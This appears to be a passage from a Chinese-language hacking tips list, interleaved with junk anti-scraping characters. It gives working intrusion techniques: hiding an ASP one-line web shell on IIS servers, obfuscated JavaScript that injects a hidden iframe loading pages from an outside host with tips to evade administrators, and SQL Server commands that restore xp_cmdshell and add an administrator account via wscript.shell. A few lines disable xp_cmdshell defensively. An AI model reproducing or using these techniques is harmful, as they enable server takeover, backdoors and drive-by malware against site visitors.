用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。5 ~1 |4 Z& z5 X
; V2 `) y4 v& t& \% y53、隐藏ASP后门的两种方法
6 M* G7 {1 g$ g2 T! ~1、建立非标准目录:mkdir images..\
}" m: {7 [5 m拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp3 T$ ~* Q4 H, k
通过web访问ASP木马:http://ip/images../news.asp?action=login3 s4 _& W# q+ X2 D, M
如何删除非标准目录:rmdir images..\ /s
4 H5 }- `" K4 R2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:% O1 A: R$ b7 P5 [! O. W
mkdir programme.asp
v( ?7 E* G2 G$ P新建1.txt文件内容:<!--#include file=”12.jpg”-->' }! @/ c- F! u# w/ Y
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件9 z$ ~+ [. a, E% m: ^: |! {
attrib +H +S programme.asp8 S* h3 D: n4 \. ^5 }
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt) z: k/ F+ @% W5 c
- d8 ~; J! [; J7 ~* B6 m
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
+ H8 C: j+ B0 q3 v: k7 Y' Y然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
- v+ B5 y3 i- k3 k; {3 [1 c
v2 C2 b$ C" `" q55、JS隐蔽挂马
# D; N+ z# C; R3 F' f2 [/ d1. I) N0 T+ e( r# C
var tr4c3="<iframe src=ht";4 `: k! U: z6 Q; O- o/ w
tr4c3 = tr4c3+"tp:/";3 F; s% v0 V- ]% |5 F7 z
tr4c3 = tr4c3+"/ww";
# L9 p6 I4 v' g2 ~, W! g. {) jtr4c3 = tr4c3+"w.tr4";% C$ ]2 T" _1 f. C* P% X
tr4c3 = tr4c3+"c3.com/inc/m";
* O: u; E8 v5 t5 i8 V4 vtr4c3 = tr4c3+"m.htm style="display:none"></i";* D# O" n( F+ @1 B
tr4c3 =tr4c3+"frame>'";
7 E- |% J6 Q% e* C* Adocument.write(tr4c3);$ E. `/ M/ @3 p' k
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
, g" u9 i; ]* t2 I
" q E0 B: g1 q9 L! I" A5 e2./ T8 ^; p( B, j8 C" H7 e1 k
转换进制,然后用EVAL执行。如& a' t9 I' @/ o8 K
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
* w1 W1 N# ?+ o+ q2 z+ c; b9 h不过这个有点显眼。, y6 Z, ?8 F" j. u( g
3.% X3 I( S& i4 ]+ [7 |1 t
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
) w. J4 i( a1 Y, e) i最后一点,别忘了把文件的时间也修改下。3 ^' o. d8 G" Z6 `: ?3 C
* ?/ e" W+ T0 J; [6 ?8 a$ c, [
56.3389终端入侵常用DOS命令 `3 v9 u# y' z* q! {
taskkill taskkill /PID 1248 /t. M& I1 p# h; l& x1 c. b$ x4 {* l7 \
# j: f' G6 e. k# d0 o/ v) T, l" h
tasklist 查进程& X. S) `! L _
+ G9 s3 U, T) w' O) F
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限. X4 b) G) Y! G+ K# P% l6 @
iisreset /reboot5 H$ J& w7 F+ ~ ?
tsshutdn /reboot /delay:1 重起服务器
1 y6 r+ k' [$ d+ E* Q% {2 M3 e2 J$ s; i' p5 f/ a" \, ~
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
% `6 y3 t+ h* A
/ r2 T$ @5 L2 G. f; O6 X! Kquery user 查看当前终端用户在线情况# ^% [; j1 _* _8 W( C" H
2 ]& q7 y0 z+ m, C; Y! d要显示有关所有会话使用的进程的信息,请键入:query process *
# h, f7 a4 { M. V0 r% U; A) L0 w1 n" d3 i4 k4 z
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:21 Y5 I: k+ P4 \5 P$ Y) \4 Q
7 \+ F/ @! ?3 t要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
/ }& z4 w4 U$ M3 e
+ R/ r/ k% p8 U要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02$ d7 V: t; p$ e# i! Q
0 p8 O! A# V" e, D* P$ M: _# h
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启& b4 C8 T& t% Z6 ]& i' J7 n) p
' }4 t, r3 ^; x' r7 r+ C9 x0 l命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统. Z2 p F$ v, Q, Z
# t8 C. ?5 B5 x+ C/ o
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。/ o+ H( N- p. G
( d! y$ @+ t* P$ I. `% L命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
1 u2 l% f% v) ?- ^0 }# J
! A/ r: Q+ X! k3 r K/ o- p4 w56、在地址栏或按Ctrl+O,输入:& ? @& U% L, u
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;2 J6 p4 g& B5 H% ~, v$ q+ O ]2 r
& f( B/ z0 u: x/ c% d. c源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
$ G$ ^+ a2 q& X* e+ D5 Z; w
% b* Y3 S7 ?0 {8 O5 k57、net user的时候,是不能显示加$的用户,但是如果不处理的话,# C# j6 u6 F' i8 F7 K7 @9 O5 ?3 x
用net localgroup administrators是可以看到管理组下,加了$的用户的。0 G* H5 K1 N5 ~$ Q' W9 U& c
, `# }4 t" y4 n7 x) t0 [& K# ]& i7 b; |
58、 sa弱口令相关命令 v" X: ^7 H% G' B" }: |1 ~
- D9 L2 V. V4 ]9 {9 u% O
一.更改sa口令方法:7 H, L- F5 p' g; |: M
用sql综合利用工具连接后,执行命令:' S9 n2 D: B( I9 u7 m. K( c
exec sp_password NULL,'20001001','sa'# u0 v0 q! E- L, z4 d9 c) }
(提示:慎用!)
7 x6 l% l, U5 x
. V3 B3 V% L+ L8 H: \5 g% W二.简单修补sa弱口令.
4 X# s' h% B& S/ |& K' M. N9 `. U7 @' w' ^0 ]
方法1:查询分离器连接后执行:3 M9 ?2 E+ y0 ]
if exists (select * from
' I! n" g6 J$ e% I Ydbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
! x5 `) e/ G2 l& p- w8 n6 QOBJECTPROPERTY(id, N'IsExtendedProc') = 1)3 v7 }3 y: ~8 k; f2 C
4 j) y! h8 |& `' \
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'' f* X3 ?* X# ]9 z! Z0 J% h
" n! b" P& l* j+ R$ E6 OGO
9 x6 [( H0 k3 |3 K, N
4 t/ ~9 S! V0 D+ }0 j3 B3 q然后按F5键命令执行完毕
/ N7 X8 R- E2 X0 m/ A) r+ H$ E
+ U1 @ i4 {( \. \方法2:查询分离器连接后" V7 N( X1 A# Q4 B0 G5 ~. v
第一步执行:use master; ] B- c) @9 K8 W& e0 j) E7 A
第二步执行:sp_dropextendedproc 'xp_cmdshell'2 A- B" I' b) {7 [ ]$ S( F
然后按F5键命令执行完毕
: j2 v4 D# H. `3 e9 ~, j. b# K$ K% R# z9 e* \
! u8 V0 i W& f. A
三.常见情况恢复执行xp_cmdshell.. i' Z& J( b4 i5 V3 }+ O6 E/ `5 o$ {
& w; e+ N+ h+ J( q' o A* C
) a' A' I- f$ `1 未能找到存储过程'master..xpcmdshell'.
6 c9 L- r& s- t' y 恢复方法:查询分离器连接后,
; E f( | F' s( L2 N1 [第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int9 _8 R$ P' L" T* M! {! [
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'7 i& _. H' J- x' R( r* w
然后按F5键命令执行完毕
. h+ @/ e0 X+ s
3 }3 I7 y& L% d; F1 N( K2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
7 n$ j( b( P. {' k2 c5 v9 s4 o恢复方法:查询分离器连接后,
& @$ R2 ]. E/ f; V/ l _- n/ q& b第一步执行:sp_dropextendedproc "xp_cmdshell"
! z: V4 \! @/ a. D6 g& M+ z! ]第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'5 F/ S D9 B# R- c5 O" s, `
然后按F5键命令执行完毕8 e; ^ g# e3 J& ~. W3 Z9 q
2 z! W8 z' l5 m/ n+ V* Z$ A3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)1 C4 j8 @- e" y
恢复方法:查询分离器连接后,, s2 S; T: j& G% B' ~( ^6 p
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
4 D) H$ g0 t+ v$ E1 [9 Q# I2 x第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
9 }+ t l+ M# T. m9 E1 t! z然后按F5键命令执行完毕& t/ D% H6 X( H
( h# I, N) {) _% p" q四.终极方法.
, u' _4 N& Y: X4 }- q; f7 v如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
1 s. k9 O! v0 J% K* L" L查询分离器连接后,( h5 W" A4 E, Y( I, h/ B
2000servser系统:
; q# r! x3 j, Edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
/ I; N l3 U' O; X8 u3 Q# e: L; P/ l5 @
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'. z8 U# ]- {- ^' X/ B0 Q
- U- N, {6 P, U; Bxp或2003server系统:/ Q% O2 ]4 {9 z' m. w: H5 ]3 t
( R$ }/ K3 i& a2 |0 i. cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'& m: q( H. X/ D$ X
# H( g5 r) Q: I+ c. ]% ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
+ ~+ v& J6 \) E' w |